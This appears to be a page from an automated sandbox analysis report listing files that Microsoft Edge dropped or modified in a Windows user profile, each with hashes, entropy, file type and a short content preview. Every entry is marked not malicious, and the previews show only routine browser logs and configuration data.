MD5:	B18F336AF424FB23FEF3AA5B4BAE771C
SHA1:	71A4F906B451B651FF06302F856125D565537DF1
SHA-256:	1ECA9E378379263A1C57EA4C88EA2C98820A9DBC7D6F82DC31B3BB8DCEB4ADF8
SHA-512:	6DB652391423D9BEC2036FC73A713E129EA451ED969EDC7C11BADB2B48CA032D0310B6D509D3DC5E032697D370C8F334BCFAAF446DCB4FAFA0600EBB4185F021
Malicious:	false
Preview:	...m.................DB_VERSION.1..k:q...............&QUERY_TIMESTAMP:domains_config_gz2...13379026170561877..QUERY:domains_config_gz2....[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	305
Entropy (8bit):	5.162080963580146
Encrypted:	false
SSDEEP:	6:7PQ+WQ3hq1qLTwi23oH+Tcwtk2WwnvB2KLlpPQ+ym24q2PqLTwi23oH+Tcwtk2WG:7oXQ1wZYebkxwnvFLToVm24v8wZYebk8
MD5:	4185B2660390E41245C34B1DB656B74D
SHA1:	ACC9EA657CD4399A04D01641CB895CF5635BF4BA
SHA-256:	E4C95B391FA4CC716646BF459E2A3FD2883946E3E7A72302B57F133CDB7203C4
SHA-512:	34AC5BB27BD554B38BF88242D3CC4457F29183D8BAEF79760C277EC585DC9D9B940D1770EC65103AEE8A1219B013DF4D5D3A06226046278F87A7141218C5C671
Malicious:	false
Preview:	2024/12/18-15:09:27.155 b90 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/18-15:09:27.218 b90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	358860
Entropy (8bit):	5.324625939083444
Encrypted:	false
SSDEEP:	6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rj:C1gAg1zfv7
MD5:	310642B254999FAFFA4416DFC685E222
SHA1:	2E1D49F61A8488ED5AA4C21B3CB48D84EC34DC24
SHA-256:	E8AD7665A73C5EA85CBB0EF51A8E5EAE6221C856CE5E7A8CD85CAD7F68875CDF
SHA-512:	01BFE0E16F5C0A08920BC75C34D78B767939191A15A1A4D72834A3EE15DB5938D624252514400F52F89CBDA5AB3E285796F9393375FFC5EC3883FFCC0EED1B2E
Malicious:	false
Preview:	{"aee_config":{"ar":{"price_regex":{"ae":"(((ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)))","dz":"(((dzd\|da\|\\x{062F}\\x{062C})\\s\\d{1,3})\|(\\d{1,3}\\s(dzd\|da\|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}\|egp)\\s\\d{1,3})\|(\\d{1,3}\\s(e\\x{00a3}\|egp)))","ma":"(((mad\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(mad\|dhs\|dh)))","sa":"((\\d{1,3}\\s(sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633}))\|((sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633})\\s\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})\|(\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})\|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})\|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.121297849334687
Encrypted:	false
SSDEEP:	6:7PQ+fl+jt+q2PqLTwi23oH+Tcwt8aPrqIFUt8OPQ+flHZmw+OPQ+flnVkwOqLTw6:7oSWov8wZYebL3FUt8OoSH/+OoSV5Tw6
MD5:	802001B4B96CB57DC2D81E60327B7254
SHA1:	1B3C021E440C56D37169D0BA38310791AF23DB04
SHA-256:	90D8F214D04FD9C99EACD53FA24A859E8A28A1BF6D0C0068B62AB170B7A5C246
SHA-512:	623C806C2B0B6A40DECE74CDEFB1CE7B1DBE2CEA486BD2B5499383BED589E89957DD70DF8E31D2536965B51A0014EEB97F1ABD6BDC7F06922A184751447600FB
Malicious:	false
Preview:	2024/12/18-15:09:22.401 1a28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/18-15:09:22.402 1a28 Recovering log #3.2024/12/18-15:09:22.402 1a28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.121297849334687
Encrypted:	false
SSDEEP:	6:7PQ+fl+jt+q2PqLTwi23oH+Tcwt8aPrqIFUt8OPQ+flHZmw+OPQ+flnVkwOqLTw6:7oSWov8wZYebL3FUt8OoSH/+OoSV5Tw6
MD5:	802001B4B96CB57DC2D81E60327B7254
SHA1:	1B3C021E440C56D37169D0BA38310791AF23DB04
SHA-256:	90D8F214D04FD9C99EACD53FA24A859E8A28A1BF6D0C0068B62AB170B7A5C246
SHA-512:	623C806C2B0B6A40DECE74CDEFB1CE7B1DBE2CEA486BD2B5499383BED589E89957DD70DF8E31D2536965B51A0014EEB97F1ABD6BDC7F06922A184751447600FB
Malicious:	false
Preview:	2024/12/18-15:09:22.401 1a28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/18-15:09:22.402 1a28 Recovering log #3.2024/12/18-15:09:22.402 1a28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.1474553644505265
Encrypted:	false
SSDEEP:	6:7PQ+fl6L9+q2PqLTwi23oH+Tcwt865IFUt8OPQ+fl6LJZmw+OPQ+fl6L9VkwOqLi:7oSbv8wZYeb/WFUt8OoS+/+OoSy5TwZr
MD5:	67A487187B8416E66978E062EB04F980
SHA1:	9E30E0DFE443C5D6E4B4C2B4E2F5E921522E86D3
SHA-256:	C704B3C12FB175BA0F444C3DADD01AD1B453A782D4D363019CDCE92DEC3671CD
SHA-512:	4E156C4048FE3A2763099204641B90015092C1060B8414216478601C797244CD368982B7ADECB21F7D29B4DAEAB53D2A3694E2D3588F0521D5F540268BA00B5E
Malicious:	false
Preview:	2024/12/18-15:09:22.405 1a28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/18-15:09:22.405 1a28 Recovering log #3.2024/12/18-15:09:22.405 1a28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.1474553644505265
Encrypted:	false
SSDEEP:	6:7PQ+fl6L9+q2PqLTwi23oH+Tcwt865IFUt8OPQ+fl6LJZmw+OPQ+fl6L9VkwOqLi:7oSbv8wZYeb/WFUt8OoS+/+OoSy5TwZr
MD5:	67A487187B8416E66978E062EB04F980
SHA1:	9E30E0DFE443C5D6E4B4C2B4E2F5E921522E86D3
SHA-256:	C704B3C12FB175BA0F444C3DADD01AD1B453A782D4D363019CDCE92DEC3671CD
SHA-512:	4E156C4048FE3A2763099204641B90015092C1060B8414216478601C797244CD368982B7ADECB21F7D29B4DAEAB53D2A3694E2D3588F0521D5F540268BA00B5E
Malicious:	false
Preview:	2024/12/18-15:09:22.405 1a28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/18-15:09:22.405 1a28 Recovering log #3.2024/12/18-15:09:22.405 1a28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
MD5:	826B4C0003ABB7604485322423C5212A
SHA1:	6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
SHA-256:	C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
SHA-512:	0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	317
Entropy (8bit):	5.192641360025953
Encrypted:	false
SSDEEP:	6:7PQ+4Vq2PqLTwi23oH+Tcwt8NIFUt8OPQ+bmZmw+OPQ+bakwOqLTwi23oH+Tcwt2:7orVv8wZYebpFUt8Oo+m/+Oo+a5TwZYN
MD5:	3678F2576251BCF8C25A73AC739A0CE1
SHA1:	AAC1DB21B71C203B87219579EF329A1C398EFA20
SHA-256:	0881CA302207939D4EBD8B934706052D2A0A4FA7E533F593B4DD5C5F364CF7AC
SHA-512:	E38EE323CA7D24F916A53367FBED6E73801856C62DA42682886F60752C369AC931970FC4BEEA7B7C28672664163FFC947FC3DFBCB59787862D39DCA66DA25CE0
Malicious:	false
Preview:	2024/12/18-15:09:23.178 7d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/18-15:09:23.179 7d0 Recovering log #3.2024/12/18-15:09:23.179 7d0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	317
Entropy (8bit):	5.192641360025953
Encrypted:	false
SSDEEP:	6:7PQ+4Vq2PqLTwi23oH+Tcwt8NIFUt8OPQ+bmZmw+OPQ+bakwOqLTwi23oH+Tcwt2:7orVv8wZYebpFUt8Oo+m/+Oo+a5TwZYN
MD5:	3678F2576251BCF8C25A73AC739A0CE1
SHA1:	AAC1DB21B71C203B87219579EF329A1C398EFA20
SHA-256:	0881CA302207939D4EBD8B934706052D2A0A4FA7E533F593B4DD5C5F364CF7AC
SHA-512:	E38EE323CA7D24F916A53367FBED6E73801856C62DA42682886F60752C369AC931970FC4BEEA7B7C28672664163FFC947FC3DFBCB59787862D39DCA66DA25CE0
Malicious:	false
Preview:	2024/12/18-15:09:23.178 7d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/18-15:09:23.179 7d0 Recovering log #3.2024/12/18-15:09:23.179 7d0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	429
Entropy (8bit):	5.809210454117189
Encrypted:	false
SSDEEP:	6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
MD5:	5D1D9020CCEFD76CA661902E0C229087
SHA1:	DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
SHA-256:	B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
SHA-512:	5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	3.6480712817282157
Encrypted:	false
SSDEEP:	384:aj9P0CQkQerkjlB773pLQP/KbtIgam6I0hlcERKToaAu:adVe2mlB7KP/SEAERKcC
MD5:	47EF51CCD01C19B7FC9215EDBEA054BA
SHA1:	DA33CD86E408B5EA7149973E5AA9403F4B5739F6
SHA-256:	F79314C88317120B0927B5DD4F8AB469C8E02EF8D191CB2892EE36EC5C04856C
SHA-512:	FB516AD8504B0A1D84BE662005C867BBE5EEAA5B177B4DE1745FBA05B2BA723BC3C589913F7FD8CCFA63389CA7D3D4A6AF47C6192994DE2928C50D9160DFDB5D
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	401
Entropy (8bit):	5.30268053617729
Encrypted:	false
SSDEEP:	12:7oKv8wZYeb8rcHEZrELFUt8OoD/+OoW5TwZYeb8rcHEZrEZSJ:7ow8wZYeb8nZrExg8OonoATwZYeb8nZR
MD5:	81E48A71CDC0D38D5B0DAD17F6AE7B43
SHA1:	D7BE4276B547CE6B03330D91F2FEE0C55288E089
SHA-256:	F8FC03163428AFB57AB660ADD4BF0521902FCF47513BE8AB0511C8758BA70F17
SHA-512:	7893B3DEE7C8494522E5B594EC44036CA9340DCC08249D35414E3466C5EEE87DCAA2515D208DDFB62A5EAB7BFB0531ABC0F8AEB201AA81F2320A204D0F9106FF
Malicious:	false
Preview:	2024/12/18-15:09:25.856 7d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/18-15:09:25.856 7d0 Recovering log #3.2024/12/18-15:09:25.857 7d0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	401
Entropy (8bit):	5.30268053617729
Encrypted:	false
SSDEEP:	12:7oKv8wZYeb8rcHEZrELFUt8OoD/+OoW5TwZYeb8rcHEZrEZSJ:7ow8wZYeb8nZrExg8OonoATwZYeb8nZR
MD5:	81E48A71CDC0D38D5B0DAD17F6AE7B43
SHA1:	D7BE4276B547CE6B03330D91F2FEE0C55288E089
SHA-256:	F8FC03163428AFB57AB660ADD4BF0521902FCF47513BE8AB0511C8758BA70F17
SHA-512:	7893B3DEE7C8494522E5B594EC44036CA9340DCC08249D35414E3466C5EEE87DCAA2515D208DDFB62A5EAB7BFB0531ABC0F8AEB201AA81F2320A204D0F9106FF
Malicious:	false
Preview:	2024/12/18-15:09:25.856 7d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/18-15:09:25.856 7d0 Recovering log #3.2024/12/18-15:09:25.857 7d0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1340
Entropy (8bit):	5.574519990635933
Encrypted:	false
SSDEEP:	24:GItZWRUlHhlvdqT8Nh2XkssXZMWvV03y1x4Cxq9IlswSMyG:rtZsqQikUssXZbvV03Sx4LylsSyG
MD5:	1E342CACF771C4303F8FF642CE6F21F8
SHA1:	8846D7E0E9E2DAF9DDCBFBA92C362B163FE89007
SHA-256:	2DE89CB5C540E8767259BFEDCF4CA951D366EEC4D0F47A4B9649B8AF4C625D0E
SHA-512:	9957F9CC0ACF34E407CC250C16C526C3015D6FEE20BBAD9B5C4F6C0EF112AAF827CE6B552D95690A48CE4EFDDBA108373859CE37FB098821FADA4BF46E430736
Malicious:	false
Preview:	r..5................VERSION.1..META:https://ntp.msn.com............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":756}.!_https://ntp.msn.com..LastKnownPV..1734552576859.-_https://ntp.msn.com..LastVisuallyReadyMarker..1734552577771.._https://ntp.msn.com..MUID!.37276334F0DB6278260F766DF1DC6332.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1734552576933,"schedule":[-1,-1,4,35,-1,-1,0],"scheduleFixed":[-1,-1,4,35,-1,-1,0],"simpleSchedule":[40,24,12,19,42,14,25]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1734552576827.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241218.110"}._https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https:/

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	329
Entropy (8bit):	5.175884744038899
Encrypted:	false
SSDEEP:	6:7PQ+f+dF39+q2PqLTwi23oH+Tcwt8a2jMGIFUt8OPQ+f7QZmw+OPQ+fOVkwOqLTZ:7oPdN4v8wZYeb8EFUt8Oo0Q/+Oo75Twe
MD5:	86D55BE15C7194424FB77A59D04DED71
SHA1:	E68ADB4AFD65C0887A7CE83C47BC6DFD441C2635
SHA-256:	7B6B83D13879289FE1D838CFC0CE1E47B5A72CF085887DC467FE91037A0E47E7
SHA-512:	FF8C76D903D07911CB89E1DF0F767DFA5DD6B1D6AEC7AB2C663B208B4A1E90697498E50B0C77623087994AA7B6B6B11D09FB7B942E3ED8ECEFB1ACED43FF1212
Malicious:	false
Preview:	2024/12/18-15:09:22.746 aa8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/18-15:09:22.748 aa8 Recovering log #3.2024/12/18-15:09:22.751 aa8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	329
Entropy (8bit):	5.175884744038899
Encrypted:	false
SSDEEP:	6:7PQ+f+dF39+q2PqLTwi23oH+Tcwt8a2jMGIFUt8OPQ+f7QZmw+OPQ+fOVkwOqLTZ:7oPdN4v8wZYeb8EFUt8Oo0Q/+Oo75Twe
MD5:	86D55BE15C7194424FB77A59D04DED71
SHA1:	E68ADB4AFD65C0887A7CE83C47BC6DFD441C2635
SHA-256:	7B6B83D13879289FE1D838CFC0CE1E47B5A72CF085887DC467FE91037A0E47E7
SHA-512:	FF8C76D903D07911CB89E1DF0F767DFA5DD6B1D6AEC7AB2C663B208B4A1E90697498E50B0C77623087994AA7B6B6B11D09FB7B942E3ED8ECEFB1ACED43FF1212
Malicious:	false
